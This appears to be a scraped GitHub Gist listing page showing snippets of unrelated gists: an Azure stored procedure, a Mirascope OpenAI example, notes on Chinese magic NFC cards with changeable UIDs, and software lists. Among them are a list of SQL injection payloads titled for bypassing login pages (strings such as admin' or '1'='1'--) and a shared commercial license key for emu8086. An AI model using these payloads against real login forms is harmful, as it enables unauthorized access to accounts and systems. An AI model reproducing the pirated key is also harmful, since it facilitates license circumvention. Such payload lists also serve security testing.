Skip to content

Instantly share code, notes, and snippets.

@joao-neves95
joao-neves95 / emu8086-license-key.txt
Last active April 26, 2024 07:47
emu8086 License Key
User: ISHAAN,glaitm
Key: 27R3VDEFYFX4N0VC3FRTQZX
@Joao-Peterson
Joao-Peterson / gmk67-manual.md
Last active April 26, 2024 07:44
GMK67 manual (English)
@metaskills
metaskills / gist:893599
Created March 29, 2011 23:54
A Copy Of sp_MSforeachtable Stored Procedure For Azure, Uses sp_MSforeach_worker
CREATE proc [dbo].[sp_MSforeachtable]
@command1 nvarchar(2000), @replacechar nchar(1) = N'?', @command2 nvarchar(2000) = null,
@command3 nvarchar(2000) = null, @whereand nvarchar(2000) = null,
@precommand nvarchar(2000) = null, @postcommand nvarchar(2000) = null
AS
declare @mscat nvarchar(12)
select @mscat = ltrim(str(convert(int, 0x0002)))
if (@precommand is not null)
exec(@precommand)
@rootsploit
rootsploit / SQLi-login-bypass.txt
Created January 25, 2021 16:51
SQL Injection Payloads to Bypass Login Page
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
# set your OPENAI_API_KEY in your .env
from openai.types.chat import ChatCompletionMessageParam
from mirascope.openai import OpenAICall
from dotenv import load_dotenv
load_dotenv()
class Librarian(OpenAICall):
prompt_template = """
SYSTEM: You are the world's greatest librarian.
MESSAGES: {history}
@mwaskom
mwaskom / replacing_seaborn_distplot.ipynb
Last active April 26, 2024 07:22
A guide to replacing the deprecated `seaborn.distplot` function.
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
@koenieee
koenieee / gist:bea8eee12a463877c839d841eebe8993
Last active April 26, 2024 07:21
Magic gen3 chinese changable UUID cards libnfc support - Piswords PCSC Mifare
====================== PCSC Mifare replacement ======================
Own implementation of the software used with the ACR122u reader software called PCSC Mifare from Piswords (a chinese seller).
Aliexpress sells these 7-byte changable UUID cards for Mifare Classic. Unfortanly it's not a normal magic card.
It's like a magic magic magic card.
They implemented a custom command themself. I didn't have a proxmark3, or ACR122u reader.
They also had software with uses the PC/SC API for their custom commands.
I only had a raspberry pi with the PN532 reader
=================================================
Unfortunately I would NOT recommend this card, it is read fine by my phone and the PN532 reader.
@ixiumu
ixiumu / SOFT.md
Last active April 26, 2024 07:20
常用软件介绍及安装包下载

木木

Windows 平台常用软件介绍、安装包下载。

常用软件

标题 描述 下载
Microsoft Edge Chromium 基于Chromium内核的Edge浏览器 下载
Chrome 快速、简单且安全的网络浏览器 新浪
@imba-tjd
imba-tjd / .Windows Optimization.md
Last active April 26, 2024 07:18
记录我使用的软件和优化Windows的操作